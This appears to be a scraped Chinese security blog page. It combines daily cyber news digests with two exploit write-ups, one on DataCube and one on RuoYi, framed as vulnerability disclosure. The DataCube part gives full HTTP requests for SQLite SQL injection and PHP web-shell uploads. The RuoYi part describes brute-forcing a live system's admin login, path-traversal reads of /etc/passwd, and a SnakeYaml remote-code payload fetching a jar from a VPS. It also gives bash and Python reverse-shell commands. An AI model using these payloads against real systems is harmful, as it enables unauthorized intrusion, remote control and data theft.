https://securityaffairs.com/163876/cyber-crime/operation-endgame.html 2024 年 5 月 27 日至 29 日,由欧洲刑警组织协调的代号为“终局行动”的国际执法行动,针对的是IcedID、SystemBC、Pikabot、Smokeloader、Bumblebee和Trickbot等恶意软件投放器。是有史以来针对僵尸网络的最大规模执法行动。 8、CISA 提醒联邦机构修补被利用的 Linux 内核漏洞 https://thehackernews.com/2024/05/cisa-alerts-federal-agencies-to-patch.html 美国网络安全和基础设施安全局 (CISA) 周四将影响 Linux 内核的安全漏洞添加到已知利用漏洞 ( KEV ) 目录中,并指出有证据显示该漏洞存在主动利用。该高严重性问题被标记为CVE-2024-1086(CVSS 评分:7.8),与 netfilter 组件中的释放后使用错误有关,该错误允许本地攻击者将权限从普通用户提升到 root 并可能执行任意代码。 9、互联网档案馆连续多日遭遇DDoS 攻击 https://www.theregister.com/2024/05/29/ddos_internet_archive/ 互联网档案馆自周日以来一直遭受分布式拒绝服务 (DDoS) 攻击,并且正在努力维持服务。攻击者每秒发起了“数以万计的虚假信息请求”。 10、新版本 Redline 木马使用 Lua 字节码逃避检测 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/ 近日,研究人员观察到 Redline Stealer 木马的新变种,开始利用 Lua 字节码逃避检测。根据遥测数据,Redline Stealer 木马已经日渐流行,覆盖北美洲、南美洲、欧洲和亚洲甚至大洋洲。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年05月30日
1、攻击者滥用WordPress插件从电商网站窃取信用卡数据 https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html 未知的威胁行为者正在滥用较少人知的WordPress代码片段插件,在受害者网站中插入恶意PHP代码,以收集信用卡数据。2024年5月11日,一场活动中滥用了名为Dessky Snippets的WordPress插件,该插件允许用户添加自定义PHP代码。目前有超过200个活跃安装。此类攻击通常利用先前披露的WordPress插件漏洞或容易猜到的凭证,获得管理员访问权限并安装其他插件(无论是合法的还是其他的)进 2、研究人员在Google Play上发现超过90个恶意Android应用 https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google 研究人员在Google Play上发现了超过90个恶意Android应用程序,这些应用程序总共被安装了超过550万次,用于传播恶意软件和广告软件。其中,Anatsa银行木马最近活动激增。Anatsa(又称“Teabot”)是一种银行木马,针对欧洲、美国、英国和亚洲的650多家金融机构的应用程序。它试图窃取人们的电子银行凭证以进行欺诈交易。自去年底以来, 3、新型ShrinkLocker勒索软件使用BitLocker加密文件 https://usa.kaspersky.com/about/press-releases/2024_kaspersky-uncovers-new-bitlocker-abusing-ransomware 一种名为ShrinkLocker的新型勒索软件通过使用Windows BitLocker创建新的启动分区来加密企业系统的文件。ShrinkLocker之所以得名,是因为它通过缩小可用的非启动分区来创建启动卷。它已被用于攻击政府机构以及疫苗和制造业部门的公司。使用BitLocker加密计算机的勒索软件并不新鲜。一名威胁行为者曾使用Windows的这一安全功能加密了比利时一家医院40台服务器 4、研究人员警告滥用Cloudflare Workers服务的网络钓鱼活动 https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling 网络安全研究人员正在警告一种滥用Cloudflare Workers服务的网络钓鱼活动,该活动用于部署钓鱼网站,收集与Microsoft、Gmail、Yahoo!和cPanel Webmail相关的用户凭证。这种攻击方法称为透明钓鱼或中间人攻击(AitM)钓鱼,研究人员在一份报告中表示,“利用Cloudflare Workers充当合法登录页面的反向代理服务器,拦截受害者和登录页面之间的流 5、First American金融公司披露12月数据泄露影响44000人 https://www.sec.gov/Archives/edgar/data/1472787/000095017024065359/faf-20240521.htm First American Financial Corporation是美国第二大产权保险公司,该公司于周二披露,12月份的一次网络攻击导致44000人受影响。该公司成立于1889年,为房地产专业人士、购房者和卖方提供金融和结算服务,涉及住宅和商业物业交易。这家总部位于加利福尼亚的公司拥有超过21000名员工,去年总收入为60亿美元。该金融服务公司在12月21日发布的声明中透露了一些有关事件性质的少量细节。为了遏制网络攻击的 6、Eclipse ThreadX 中的漏洞可能导致代码执行 https://www.securityweek.com/vulnerabilities-in-eclipse-threadx-could-lead-to-code-execution/ Humanativa Group 发布了有关 Eclipse ThreadX(一种用于物联网设备的实时操作系统)中发现的多个漏洞的信息。 7、Check Point 警告其 VPN 网关产品可能遭受零日攻击 https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html Check Point 警告称,其网络安全网关产品中存在零日漏洞,威胁行为者已在野利用该漏洞。该问题被标记为CVE-2024-24919,影响 CloudGuard Network、Quantum Maestro、Quantum Scalable Chassis、Quantum Security Gateways 和 Quantum Spark 设备。 8、 BreachForums 在FBI执法行动后重新复活上线 https://securityaffairs.com/163841/cyber-crime/breachforums-resurrected-after-fbi-seizure.html 网络犯罪论坛 BreachForums 在执法行动查封其基础设施两周后重新恢复运行。 9、CatDDoS僵尸网络利用80多个已知安全漏洞发起 DDoS攻击 https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html 奇安信在过去3个月内发现名为CatDDoS 的恶意软件僵尸网络利用80多个漏洞对各类软件实施攻击,包括分布式拒绝服务 (DDoS) 攻击。奇安信X实验室团队发现,这些漏洞影响了Apache(ActiveMQ、Hadoop、Log4j 和 RocketMQ)、Cacti、Cisco、D-Link、DrayTek、FreePBX、GitLab、Gocloud、Huawei、Jenkins、Linksys、Metabase、NETGEAR、Re 10、俄罗斯最大快递公司CDEK遭黑客攻击,导致业务全面停摆 https://therecord.media/russian-delivery-company-cdek-down-cyberattack 近日,俄罗斯最大的快递公司之一 CDEK 遭遇了网络攻击负责,这次攻击导致该公司的服务中断数日。事件发生后,有一些自称 “Head Mare ”的俄语黑客声称对此次攻击负责,他们用勒索软件加密了该公司的服务器,并销毁了公司系统的备份副本。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
DataCube 漏洞小结
在这里分享一下通过拖取 DataCube 代码审计后发现的一些漏洞,包括前台的文件上传,信息泄露出账号密码,后台的文件上传。当然还有部分 SQL 注入漏洞,因为 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的漏洞,可以互相讨论。 phpinfo 泄露 SQL注入 无回显的SQL注入 /DataCube/www/admin/setting_schedule.php SQLite 没有sleep()函数,但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数,它的作用是生成一个指定长度的随机二进制字符串。 正常请求时间 POST /admin/setting_schedule.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1 延时响应 判断对应的 SQLite 的版本号 POST /admin/setting_schedule.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close datetime=-1'or+(case+when(substr(sqlite_version(),1,1)<'4')+then+randomblob(900000000000000000000000000)+else+0+end)+and+'1&tbl_type=fs&delete=1 可以判断出SQLite的版本是3 有回显的SQL注入 POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close req_id=1) UNION ALL SELECT sqlite_version(),NULL,NULL-- 查询出 sqlite 的版本号 www\admin\pr_monitor\getting_index_data.php www\admin\pr_monitor\getting_screen_data.php#getData www\admin\pr_monitor\getting_screen_data.php#getMonitorItemList 信息泄露 www\admin\config_all.php 将从 SQLite3 数据库中获取的数据转换为一个 JSON 字符串,并输出在页面上 任意文件上传 www\admin\transceiver_schedule.php POST /admin/transceiver_schedule.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb8tU2iptV70lGozq User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryb8tU2iptV70lGozq Content-Disposition: form-data; name="upload_file"; filename="test1.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryb8tU2iptV70lGozq Content-Disposition: form-data; name="usb_schedule" 1 ------WebKitFormBoundaryb8tU2iptV70lGozq-- 后台任意文件上传 www\admin\setting_photo.php www\admin\setting_photo.php#insertPhoto www\admin\images.php 登录后获取参数 accesstime 的值 将值替换到数据包中 POST /admin/setting_photo.php HTTP/1.1 Content-Length: 414 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydzDlRcTHEmG3mohY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="add" 1 ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="addPhoto"; filename="test.php" Content-Type: image/jpeg <?php phpinfo(); ?> ------WebKitFormBoundarydzDlRcTHEmG3mohY Content-Disposition: form-data; name="accesstime" 0.05027100 1713945976 ------WebKitFormBoundarydzDlRcTHEmG3mohY-- 成功将文件上传到 /images/slideshow/ 目录下 尚未解决的后台SQL注入 类似的注入有很多,但是每一次都进行了 accesstime 的校验,所以需要不停的从页面上获取,这里仅从一处来进行探讨 www\admin\config_time_sync.php www\admin\Util.class.php#TblConfUpdate 我们很明显的可以看到这里的SQL 语句是我们可控的 首先请求页面 /admin/config_time_sync.php 来获取一个 accesstime 值 再构造请求进行发包 我们将执行的 SQL 语句打印出来 BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.enable';insert into tbl_conf values('ntp.enable', 'true');select randomblob(999900000000000000000000000);select ('1');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.server';insert into tbl_conf values('ntp.server', 're-ene.energia.c 这里很奇怪,已经完美的闭合并提示执行成功,却没有执行这条语句,有明白的大佬可以一起讨论一下。
网络安全日报 2024年05月29日
1、BLOODALCHEMY恶意软件针对南亚和东南亚政府发起攻击 https://blog-en.itochuci.co.jp/entry/2024/05/23/090000 网络安全研究人员发现,用于攻击南亚和东南亚政府组织的BLOODALCHEMY恶意软件实际上是Deed RAT的更新版本,后者被认为是ShadowPad的继任者。BLOODALCHEMY和Deed RAT的起源是ShadowPad,考虑到ShadowPad在众多APT攻击活动中的历史,特别关注这种恶意软件的使用趋势是至关重要的。BLOODALCHEMY首次是在2023年10月记录,当时与其追踪的REF5961入侵组织在东南亚国家联盟(ASEAN)国家的攻击活动有关。这是一个用C语言编写 2、攻击者利用木马化扫雷游戏的Python版本攻击金融组织 https://cert.gov.ua/article/6279419 黑客利用微软经典扫雷游戏的Python克隆代码,在针对欧洲和美国金融机构的攻击中隐藏恶意脚本。研究人员将这些攻击归因于被追踪为“UAC-0188”的威胁行为者,后者使用合法代码隐藏下载并安装SuperOps RMM的Python脚本。SuperOps RMM是一款合法的远程管理软件,能够使远程攻击者直接访问受感染系统。在最初发现此次攻击后,研究显示在欧洲和美国的金融和保险机构中,至少有五次潜在的入侵由相同的文件导致。 3、恶意谷歌推广广告利用新发布的Arc浏览器发起攻击 https://www.threatdown.com/blog/threat-actors-ride-the-hype-for-newly-released-arc-browser/ 与Arc浏览器Windows版发布同时进行的一场谷歌广告恶意软件活动,诱骗用户下载被植入木马的安装程序,从而感染恶意软件。Arc浏览器是一款具有创新用户界面设计的新型网络浏览器,与传统浏览器不同。在2023年7月发布macOS版本后,获得了科技媒体和用户的高度评价,其近期在Windows上的发布备受期待。网络犯罪分子为产品发布做了准备,在谷歌搜索上设置恶意广告,诱骗想要下载新浏览器的用户。谷歌的广告平台存在一个 4、Cencora遭遇数据泄露暴露了11家制药公司的美国患者信息 https://www.bleepingcomputer.com/news/security/cencora-data-breach-exposes-us-patient-info-from-11-drug-companies/ 由于Cencora在2024年2月遭受的网络攻击,一些全球最大的制药公司披露了数据泄露事件。Cencora是他们在制药和业务服务方面的合作伙伴。Cencora,前身为AmerisourceBergen,是一家专注于药品分销、特殊药房、咨询和临床试验支持的制药服务提供商。这家总部位于宾夕法尼亚州的公司在50个国家开展业务,拥有46000名员工,2023年收入为2620 5、微软Copilot在全球停机24小时后恢复正常 https://www.bleepingcomputer.com/news/microsoft/microsoft-copilot-fixed-worldwide-after-24-hour-outage/ 在超过24小时的停机后,微软的Bing、Copilot和Windows中的Copilot服务已在全球范围内恢复正常,但尚未发布有关导致问题的原因的信息。这次大规模停机始于周四凌晨3点(美国东部时间),主要影响亚洲和欧洲的用户,导致许多人无法访问这些服务。在停机期间,Bing.com显示空白页面或429 HTTP错误代码,但直接的Bing搜索仍然可用。微软在一天内不断分享更新,最初表示,“ 6、OpenAI 成立安全委员会,开始训练最新的人工智能模型 https://www.securityweek.com/openai-forms-safety-committee-as-it-starts-training-latest-artificial-intelligence-model/ OpenAI 正在成立一个新的安全委员会,并已开始训练一种新的人工智能模型,以取代其 ChatGPT 聊天机器人所依赖的 GPT-4 系统。 7、TP-Link 游戏路由器漏洞使用户面临远程代码攻击 https://thehackernews.com/2024/05/tp-link-gaming-router-vulnerability.html TP-Link Archer C5400X 游戏路由器被披露存在一个最高严重性安全漏洞,该漏洞可能通过发送特制的请求导致易受攻击的设备执行远程代码。该漏洞被标记为CVE-2024-5035,CVSS 评分为 10.0。它会影响路由器固件的所有版本,包括 1_1.1.6 及之前版本。该漏洞已在2024 年 5 月 24 日发布的1_1.1.7 版本中得到修补。 8、SingCERT 警告称,多个 WordPress 插件中发现严重漏洞 https://thecyberexpress.com/wordpress-plugin-vulnerabilities/ SingCERT 报告了 9 个严重的 WordPress 插件漏洞,并分享了缓解策略以避免被威胁行为者利用。 9、白宫宣布计划在年底前改革数据路由安全 https://www.nextgov.com/cybersecurity/2024/05/white-house-announces-plans-revamp-data-routing-security-year-end/396886/ 白宫网络官员周四表示,到今年年底,联邦机构拥有和使用的 50% 以上的 IP 地址将采用增强的数据路由安全措施,以帮助防止黑客劫持进入政府网络的数字通道。 10、印度军方和警方生物识别数据遭泄露 https://www.anquanke.com/post/id/296855 网络安全研究员 Jeremiah Fowler 发现并向WebsitePlanet报告了一个未受密码保护的数据库,其中包含 160 多万份文件,这些文件属于印度一家领先的生物特征认证解决方案提供商,该提供商在美国和澳大利亚设有办事处。暴露的记录包括警察、军队、教师和铁路工人的生物特征身份信息。同时,这些数据似乎可能在暗网相关的 Telegram 群组中出售。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记录一次cnvd事件型证书漏洞挖掘
事件起因是因为要搞毕设了,在为这个苦恼,突然负责毕设的老师说得到cnvd下发的证书结合你的漏洞挖掘的过程是可以当成毕设的,当时又学习了一段时间的web渗透方面的知识,于是踏上了废寝忘食的cnvd证书漏洞挖掘的日子。 前言:听群友们说,一般可以获得cnvd事件型的证书要三大运营商、铁塔的漏洞,而且必须要高危的漏洞才可以获得证书,低危和中危都没有证书,交上去只能得到cnvd的漏洞编号,于是就朝着三大运营商、铁塔的高危漏洞去挖掘。 一、信息收集 信息收集的目的是了解目标的基本情况,包括网络拓扑结构、系统架构、运行的服务和应用程序、已知漏洞、潜在安全风险等。通过信息收集,渗透测试人员可以获得对目标的深入了解,从而确定可能的攻击矢量和漏洞利用路径,为后续的渗透测试工作做准备。 1、我一般先用奇安信的鹰图平台,使用里面搜索引擎的特定的语法搜索我要找的单位名或者关键字,精准定位。 鹰图平台:https://hunter.qianxin.com/ 经过一段时间的换各种关键字的搜索,终于发现了一个看着系统界面比较眼熟的界面,原谅我的厚码。。。 看着大概率是若依框架。 确定为vue前后端分离的若依管理系统。 二、历史漏洞分析 确定了这个系统是基于SpringBoot,Spring Security,JWT,Vue & Element 的前后端分离权限管理系统。 这是我第一次挖掘关于若依vue框架的系统,以前遇到的都是基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro。 让我们先来看看若依的历史漏洞和解析:若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令。 若依后台管理系统是基于SpringBoot、Spring Security、JWT、Vue & Element 的前后端分离权限管理系统,可用于包含网站管理后台、网站会员中心、CMS、CRM、OA等、的Web应用程序。若依后台管理系统存在未授权访问和文件上传高危漏洞,攻击者可利用该漏洞获取服务器控制权。 比较常见的历史漏洞: 1、前端存储账号密码或默认弱口令admin/admin123 2、Druid页面未授权访问 http://xxx//prod-api/druid/index.htmlhttp://xxx//dev-api/druid/index.htmlhttp://xxx//api/druid/index.htmlhttp://xxx//admin/druid/index.htmlhttp://xxx//admin-api/druid/index.html3、后台任意文件读取http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd 4、后台SQL注入漏洞位置在"系统管理"里中的"角色管理中"http://xxxxxxx/system/role/listhttp://xxxxxxx/system/dept/edithttp://xxxxxxx/system/role/exporthttp://xxxxxxx/tool/gen/createTable 5、shiro反序列化 若依管理系统使用了Apache Shiro,Shiro 提供了记住我(RememberMe)的功能,下次访问时无需再登录即可访问。系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。 攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞,进而在目标机器上执行任意命令。 众所周知的,网上大把工具撸就完事了https://github.com/SummerSec/ShiroAttack2 6、SnakeYaml组件漏洞-定时任务-RCE 定时任务对于传入的"调用目标字符串"没有任何校验,导致攻击者可以调用任意类、方法及参数触发反射执行命令。 RuoYi 触发 SnakeYaml 反序列化漏洞的漏洞点。漏洞点在后台 系统监控 > 定时任务 处,可以调用类的方法 系统会调用 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod 方法来处理系统任务 首先会获取需要执行的目标,即我们的 payload,再获取实例名和方法名以及方法参数 然后判断实例名是否是 带完全包名称的类名,如果不是的话,则调用 SpringUtils.getBean(beanName) 获得实例;如果是的话,则使用 Class.forName(beanName).newInstance() 获得实例 最后调用 invokeMethod(SysJob sysJob) 方法实现方法的调用 public static void invokeMethod(SysJob sysJob) throws Exception     {          String invokeTarget \= sysJob.getInvokeTarget();          String beanName \= getBeanName(invokeTarget);              String methodName \= getMethodName(invokeTarget);          List<Object\[\]> methodParams \= getMethodParams(invokeTarget);          if (!isValidClassName(beanName))         {              Object bean \= SpringUtils.getBean(beanName);              invokeMethod(bean, methodName, methodParams);         }          else         {              Object bean \= Class.forName(beanName).newInstance();              invokeMethod(bean, methodName, methodParams);         }     }   跟进 com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod 可以看到这里通过 getDeclaredMethod 获得了类的方法,然后通过反射执行方法。 当我们传入的类名为完全包名称,需要满足三个条件才能正常使用 具有无参构造方法 调用的方法需要是类自身声明的方法,不能是他的父类方法 构造方法和调用的方法均为 public 而 org.yaml.snakeyaml.Yaml 是符合这些条件的,我们可以利用这个点去触发 SnakeYaml 反序列化漏洞。 三、正戏开始 要获得证书就得要挖掘到高危的漏洞,若依vue框架是没有shiro反序列化的,所以得进入后台去挖掘定时任务的RCE。 1、回到之前的找到若依的登录框,上来肯定是试一试默认的弱口令admin123。不出意外密码错误了 2、测试了一下,没有密码输入错误次数上限,就是输入错多少次都可以,也没有验证码验证登录,不用多说了,爆破启动!!! 抱着试一试的态度,没想到真滴爆出来了 毕竟是第一次打若依vue框架的,我就把上面提到的漏洞都测试了一遍,没一个成功的(除了定时任务-RCE的漏洞没测试)。。。。。 3、我先去网上浏览一阵子的若依后台定时任务调用类的方法RCE的文章,开搞!!! 首先先去Github上面找到大佬写好的项目生成恶意jar包:https://github.com/artsploit/yaml-payload先修改项目源码文件 src/artsploit/AwesomeScriptEngineFactory.java 执行Linux反弹shell命令 修改AwesomeScriptEngineFactory.java格式: Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/vpsIP/vps监听端口 0>&1"}); 在yaml-payload-master文件夹目录下编译AwesomeScriptEngineFactory.java文件 javac .\src\artsploit\AwesomeScriptEngineFactory.java 得到编译好的AwesomeScriptEngineFactory.class文件 把src目录打包成yaml-payload.jar文件 jar -cvf yaml-payload.jar -C .\src\ . 把打包好的yaml-payload.jar上传到vps上面,使用python命令开启临时的http网站:`python -m SimpleHTTPServer 8880 测试访问vps开启的网站 在vps上面使用nc监听设定的端口,反弹shell 回到若依系统后台,使用爆破出来的账号密码登录,进入系统监控-->定时任务-->新增,添加计划任务。 调用方法也没有什么限制,可以直接使用http。任务名随便写,调用方法:org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager \[ !!java.net.URLClassLoader \[\[ !!java.net.URL \["http://httpIP/yaml-payload.jar"\] \]\] \]') cron表达式:0/10 \* \* \* \* ? 点击确定 在多执行几次刚刚设置好的定时任务 在我满心欢喜的以为成功的时候,现实却给我当头一棒,nc监听一直没有动静,啊啊啊啊啊啊啊啊啊。。。。。又去多执行了几次也没有反弹到shell 去看刚刚vps使用python开启的http,没有访问响应gg。 想了想会不会是命令被系统拦截了或者是AwesomeScriptEngineFactory.java文件里面的命令错误执行不了。于是又去换了一种方式的反弹shell命令 重新修改AwesomeScriptEngineFactory.java格式:使用base64编码这个命令:bash -i >& /dev/tcp/vpsIP/vps监听端口 0>&1base64编码后的命令:YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgMD4mMQ==AwesomeScriptEngineFactory.java格式:Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNJUC92cHPnm5HlkKznq6/lj6MgM 再按照上面的方法编译一遍,然后再打包成jar文件,再次上传到vps里面,把之前的删掉。 返回到若依管理系统,再次执行几次定时任务,不用更改。。。让命令飘一会。 pleasantly surprised。。。。gg了。 四、柳暗花明 我以为要下播的时候,去上了个厕所。。。。回来突然有灵感想到可不可以使用python命令来执行反弹shell命令呢,现在的服务器linux服务器基本都是自带python的,说干就干。 继续修改AwesomeScriptEngineFactory.java文件使用python的特性构造payload,修改的格式:Runtime.getRuntime().exec(new String\[\]{"python","-c","import os,socket,subprocess;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(('vpsIP',vps监听端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=su 如下图: 继续执行之前的步骤,按照上面的方法编译一遍,然后再打包成jar文件,再次上传到vps里面,把之前的删掉。 回到若依管理系统继续执行我们写入的定时任务。 结果芜湖!!!成功成功。 咱也不知道为什么。没拦截python? 最后也是通过了cnvd的事件型高危 漏洞已上报厂家,厂家已修复。 修复建议:升级Ruoyi至最新版本。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页